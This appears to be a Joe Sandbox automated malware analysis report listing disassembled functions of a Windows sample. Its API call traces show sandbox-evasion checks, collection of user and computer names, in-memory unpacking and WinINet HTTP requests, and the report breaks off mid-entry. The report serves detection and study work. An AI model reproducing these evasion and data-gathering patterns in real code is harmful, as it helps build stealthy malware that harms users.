                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                                                    • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                                                    • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                                                    • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                                                  • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                  • API String ID: 3630751533-2791005934
                                                                                  • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                                                  • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                                                  • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                                                  • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA
                                                                                  Function 00417500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1090 417500-41754a GetWindowsDirectoryA 1091 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1090->1091 1092 41754c 1090->1092 1099 4175d8-4175df 1091->1099 1092->1091 1100 4175e1-4175fa call 418d00 1099->1100 1101 4175fc-417617 GetProcessHeap HeapAlloc 1099->1101 1100->1099 1103 417619-417626 call 41a740 1101->1103 1104 417628-417658 wsprintfA call 41a740 1101->1104 1111 41767e-41768e 1103->1111 1104->1111
                                                                                  APIs
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                                                  • wsprintfA.USER32 ref: 00417640
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                  • String ID: :$C$\
                                                                                  • API String ID: 3790021787-3809124531
                                                                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                  • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                  • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9
                                                                                  Function 00B0003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1112 b0003c-b00047 1113 b00049 1112->1113 1114 b0004c-b00263 call b00a3f call b00e0f call b00d90 VirtualAlloc 1112->1114 1113->1114 1129 b00265-b00289 call b00a69 1114->1129 1130 b0028b-b00292 1114->1130 1135 b002ce-b003c2 VirtualProtect call b00cce call b00ce7 1129->1135 1131 b002a1-b002b0 1130->1131 1134 b002b2-b002cc 1131->1134 1131->1135 1134->1131 1141 b003d1-b003e0 1135->1141 1142 b003e2-b00437 call b00ce7 1141->1142 1143 b00439-b004b8 VirtualFree 1141->1143 1142->1141 1144 b005f4-b005fe 1143->1144 1145 b004be-b004cd 1143->1145 1148 b00604-b0060d 1144->1148 1149 b0077f-b00789 1144->1149 1147 b004d3-b004dd 1145->1147 1147->1144 1153 b004e3-b00505 LoadLibraryA 1147->1153 1148->1149 1154 b00613-b00637 1148->1154 1151 b007a6-b007b0 1149->1151 1152 b0078b-b007a3 1149->1152 1156 b007b6-b007cb 1151->1156 1157 b0086e-b008be LoadLibraryA 1151->1157 1152->1151 1158 b00517-b00520 1153->1158 1159 b00507-b00515 1153->1159 1160 b0063e-b00648 1154->1160 1161 b007d2-b007d5 1156->1161 1164 b008c7-b008f9 1157->1164 1162 b00526-b00547 1158->1162 1159->1162 1160->1149 1163 b0064e-b0065a 1160->1163 1165 b00824-b00833 1161->1165 1166 b007d7-b007e0 1161->1166 1167 b0054d-b00550 1162->1167 1163->1149 1168 b00660-b0066a 1163->1168 1169 b00902-b0091d 1164->1169 1170 b008fb-b00901 1164->1170 1176 b00839-b0083c 1165->1176 1171 b007e2 1166->1171 1172 b007e4-b00822 1166->1172 1173 b005e0-b005ef 1167->1173 1174 b00556-b0056b 1167->1174 1175 b0067a-b00689 1168->1175 1170->1169 1171->1165 1172->1161 1173->1147 1177 b0056d 1174->1177 1178 b0056f-b0057a 1174->1178 1179 b00750-b0077a 1175->1179 1180 b0068f-b006b2 1175->1180 1176->1157 1181 b0083e-b00847 1176->1181 1177->1173 1183 b0059b-b005bb 1178->1183 1184 b0057c-b00599 1178->1184 1179->1160 1185 b006b4-b006ed 1180->1185 1186 b006ef-b006fc 1180->1186 1187 b00849 1181->1187 1188 b0084b-b0086c 1181->1188 1195 b005bd-b005db 1183->1195 1184->1195 1185->1186 1189 b0074b 1186->1189 1190 b006fe-b00748 1186->1190 1187->1157 1188->1176 1189->1175 1190->1189 1195->1167
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00B0024D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID: cess$kernel32.dll
                                                                                  • API String ID: 4275171209-1230238691
                                                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                  • Instruction ID: 293467810f54ff19ff41081e7c88459f5451543b860974326a3aab944536eba1
                                                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                  • Instruction Fuzzy Hash: 32526974A11229DFDB64CF58C984BA8BBB1BF09304F1480E9E54DAB391DB30AE95DF14
                                                                                  Function 004169F0 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D7FD8), ref: 004198A1
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D8038), ref: 004198BA
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D8068), ref: 004198D2
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D8098), ref: 004198EA
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D80B0), ref: 00419903
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00904578), ref: 0041991B
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D3010), ref: 00419933
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D2FF0), ref: 0041994C
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D80F8), ref: 00419964
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00905D90), ref: 0041997C
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00905D60), ref: 00419995
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00905B68), ref: 004199AD
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,008D2DB0), ref: 004199C5
                                                                                    • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,00905CE8), ref: 004199DE
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                                                    • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                                                    • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                                                    • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                                                    • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                                                    • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                                                    • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                                                    • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                                                    • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                                                    • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                                                    • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                                                    • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                                                    • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                                                    • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                    • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                    • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009045D8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                                                  • CloseHandle.KERNEL32(?,00000000,?,009045D8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 3511611419-0
                                                                                  • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                                                  • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                                                  • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                                                  • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE
                                                                                  Function 004047B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ??2@$CrackInternetlstrlen
                                                                                  • String ID: <
                                                                                  • API String ID: 1683549937-4251816714
                                                                                  • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                                                  • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                                                  • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                                                  • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95
                                                                                  Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1261 401220-401247 call 4189b0 GlobalMemoryStatusEx 1264 401273-40127a 1261->1264 1265 401249-401271 call 41da00 * 2 1261->1265 1266 401281-401285 1264->1266 1265->1266 1268 401287 1266->1268 1269 40129a-40129d 1266->1269 1271 401292-401294 ExitProcess 1268->1271 1272 401289-401290 1268->1272 1272->1269 1272->1271
                                                                                  APIs
                                                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                  • __aulldiv.LIBCMT ref: 00401258
                                                                                  • __aulldiv.LIBCMT ref: 00401266
                                                                                  • ExitProcess.KERNEL32 ref: 00401294
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                  • String ID: @
                                                                                  • API String ID: 3404098578-2766056989
                                                                                  • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                  • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                                                  • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                                                  • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D
                                                                                  Function 00416AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1275 416af3 1276 416b0a 1275->1276 1278 416aba-416ad7 call 41aad0 OpenEventA 1276->1278 1279 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1276->1279 1285 416af5-416b04 CloseHandle Sleep 1278->1285 1286 416ad9-416af1 call 41aad0 CreateEventA 1278->1286 1285->1276 1286->1279
                                                                                  APIs
                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009045D8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                                                  • Sleep.KERNEL32(00001770), ref: 00416B04
                                                                                  • CloseHandle.KERNEL32(?,00000000,?,009045D8,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                                                  • ExitProcess.KERNEL32 ref: 00416B22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                  • String ID:
                                                                                  • API String ID: 941982115-0
                                                                                  • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                                                  • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                                                  • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                                                  • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                                                  Function 004151F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00906260), ref: 00406303
                                                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0090B380,00000000,00000000,00400100,00000000), ref: 00406385
                                                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                  • String ID: ERROR$ERROR
                                                                                  • API String ID: 3287882509-2579291623
                                                                                  • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                                                  • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                                                  • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                                                  • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                                                  Function 004178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                  • String ID:
                                                                                  • API String ID: 4203777966-0
                                                                                  • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                                                  • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                                                  • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                                                  • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                                                  Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                                                  • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                                                  • ExitProcess.KERNEL32 ref: 00401143
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 1103761159-0
                                                                                  • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                                                  • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                                                  • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                                                  • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                                                  Function 008D9F46 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008D9F6E
                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 008D9F8E
                                                                                  Memory Dump Source
